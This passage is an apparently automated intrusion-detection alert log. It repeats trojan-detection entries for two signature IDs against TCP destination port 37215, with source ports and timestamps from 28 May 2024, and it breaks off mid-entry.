          SID:2835222
          Source Port:47342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.318820
          SID:2835222
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481158
          SID:2835222
          Source Port:42780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062583
          SID:2829579
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126658
          SID:2829579
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356849
          SID:2835222
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985199
          SID:2835222
          Source Port:53392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114095
          SID:2829579
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233082
          SID:2835222
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628446
          SID:2829579
          Source Port:57460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594722
          SID:2835222
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201598
          SID:2835222
          Source Port:33160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025823
          SID:2829579
          Source Port:41764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065308
          SID:2835222
          Source Port:45130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.535835
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266230
          SID:2835222
          Source Port:49212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818037
          SID:2829579
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666611
          SID:2835222
          Source Port:51872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475764
          SID:2829579
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799169
          SID:2829579
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266590
          SID:2835222
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933452
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543521
          SID:2829579
          Source Port:53586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476378
          SID:2835222
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594874
          SID:2835222
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305196
          SID:2829579
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474168
          SID:2835222
          Source Port:52822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630563
          SID:2829579
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.118004
          SID:2829579
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285969
          SID:2835222
          Source Port:45206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484643
          SID:2835222
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113093
          SID:2829579
          Source Port:52786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231688
          SID:2835222
          Source Port:47798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114605
          SID:2835222
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087759
          SID:2829579
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160321
          SID:2829579
          Source Port:60890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987469
          SID:2835222
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334159
          SID:2835222
          Source Port:40312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677489
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796493
          SID:2835222
          Source Port:56692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297457
          SID:2829579
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930918
          SID:2835222
          Source Port:42268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287723
          SID:2835222
          Source Port:42990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434844
          SID:2829579
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295248
          SID:2829579
          Source Port:56118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551290
          SID:2835222
          Source Port:48128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813596
          SID:2829579
          Source Port:38326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140219
          SID:2835222
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876637
          SID:2829579
          Source Port:37896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300316
          SID:2829579
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201387
          SID:2829579
          Source Port:59676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126674
          SID:2835222
          Source Port:48686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157914
          SID:2835222
          Source Port:34838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.240262
          SID:2835222
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913785
          SID:2835222
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161366
          SID:2829579
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021454
          SID:2829579
          Source Port:40308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092717
          SID:2829579
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593199
          SID:2835222
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595013
          SID:2835222
          Source Port:49420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710185
          SID:2835222
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405407
          SID:2829579
          Source Port:37184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2829579
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080846
          SID:2829579
          Source Port:45886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332384
          SID:2835222
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857746
          SID:2835222
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879283
          SID:2829579
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593350
          SID:2835222
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178965
          SID:2835222
          Source Port:44246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665072
          SID:2835222
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206780
          SID:2829579
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267704
          SID:2829579
          Source Port:44190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212724
          SID:2835222
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117019
          SID:2829579
          Source Port:38602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321050
          SID:2829579
          Source Port:49904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132913
          SID:2829579
          Source Port:37766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793404
          SID:2829579
          Source Port:53670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228001
          SID:2829579
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889202
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183817
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472607
          SID:2835222
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510378
          SID:2829579
          Source Port:44728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084210
          SID:2835222
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685481
          SID:2835222
          Source Port:46676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267084
          SID:2835222
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710123
          SID:2835222
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501136
          SID:2829579
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348711
          SID:2829579
          Source Port:53274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976823
          SID:2835222
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939386
          SID:2835222
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062074
          SID:2835222
          Source Port:60950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806876
          SID:2835222
          Source Port:47186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268575
          SID:2835222
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965182
          SID:2835222
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168458
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075724
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214671
          SID:2829579
          Source Port:51048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084268
          SID:2835222
          Source Port:52596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607553
          SID:2835222
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039217
          SID:2829579
          Source Port:36586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2829579
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891643
          SID:2835222
          Source Port:46344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065991
          SID:2829579
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.311690
          SID:2829579
          Source Port:56150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044773
          SID:2829579
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985182
          SID:2829579
          Source Port:48340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513309
          SID:2835222
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975012
          SID:2835222
          Source Port:47540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083509
          SID:2835222
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525457
          SID:2835222
          Source Port:58786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332036
          SID:2835222
          Source Port:33608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300010
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156629
          SID:2829579
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117156
          SID:2829579
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708351
          SID:2829579
          Source Port:53266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733035
          SID:2835222
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214293
          SID:2835222
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336653
          SID:2835222
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112900
          SID:2829579
          Source Port:34654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175751
          SID:2829579
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874000
          SID:2829579
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878707
          SID:2835222
          Source Port:34982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269659
          SID:2835222
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866770
          SID:2829579
          Source Port:58542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708451
          SID:2829579
          Source Port:44112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846874
          SID:2835222
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610545
          SID:2829579
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807882
          SID:2829579
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848523
          SID:2829579
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848431
          SID:2829579
          Source Port:54080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528218
          SID:2829579
          Source Port:51950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269864
          SID:2829579
          Source Port:44414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550115
          SID:2829579
          Source Port:45278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219601
          SID:2829579
          Source Port:45852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626543
          SID:2835222
          Source Port:48850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142064
          SID:2835222
          Source Port:57158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852091
          SID:2829579
          Source Port:58244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210299
          SID:2835222
          Source Port:59658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843104
          SID:2835222
          Source Port:38526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599063
          SID:2835222
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151211
          SID:2835222
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144993
          SID:2835222
          Source Port:37468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552246
          SID:2829579
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671627
          SID:2835222
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842223
          SID:2829579
          Source Port:37416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.443253
          SID:2835222
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543592
          SID:2829579
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222500
          SID:2829579
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138104
          SID:2829579
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439400
          SID:2835222
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.066241
          SID:2835222
          Source Port:34656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352493
          SID:2829579
          Source Port:48098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.739085
          SID:2835222
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848665
          SID:2829579
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326876
          SID:2835222
          Source Port:39210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848473
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2829579
          Source Port:33868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.296535
          SID:2829579
          Source Port:46534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322295
          SID:2835222
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357223
          SID:2829579
          Source Port:35660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483053
          SID:2829579
          Source Port:35376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173143
          SID:2829579
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188119
          SID:2829579
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992359
          SID:2829579
          Source Port:42336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103112
          SID:2835222
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065373
          SID:2829579
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555340
          SID:2829579
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291612
          SID:2829579
          Source Port:49572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938527
          SID:2829579
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136797
          SID:2835222
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249083
          SID:2835222
          Source Port:43276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767375
          SID:2829579
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.219899
          SID:2835222
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164576
          SID:2829579
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760241
          SID:2829579
          Source Port:51968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114517
          SID:2835222
          Source Port:59648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131675
          SID:2835222
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923286
          SID:2829579
          Source Port:51640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652276
          SID:2835222
          Source Port:43752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722411
          SID:2829579
          Source Port:49352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797388
          SID:2835222
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117247
          SID:2829579
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223462
          SID:2835222
          Source Port:35834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124585
          SID:2835222
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715213
          SID:2835222
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992158
          SID:2835222
          Source Port:51990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962872
          SID:2829579
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105701
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802714
          SID:2835222
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159141
          SID:2829579
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341021
          SID:2835222
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063199
          SID:2829579
          Source Port:44266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874704
          SID:2835222
          Source Port:33234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300630
          SID:2835222
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206254
          SID:2835222
          Source Port:39794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543551
          SID:2829579
          Source Port:39862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680341
          SID:2835222
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669263
          SID:2829579
          Source Port:40674
          Destination Port:37215
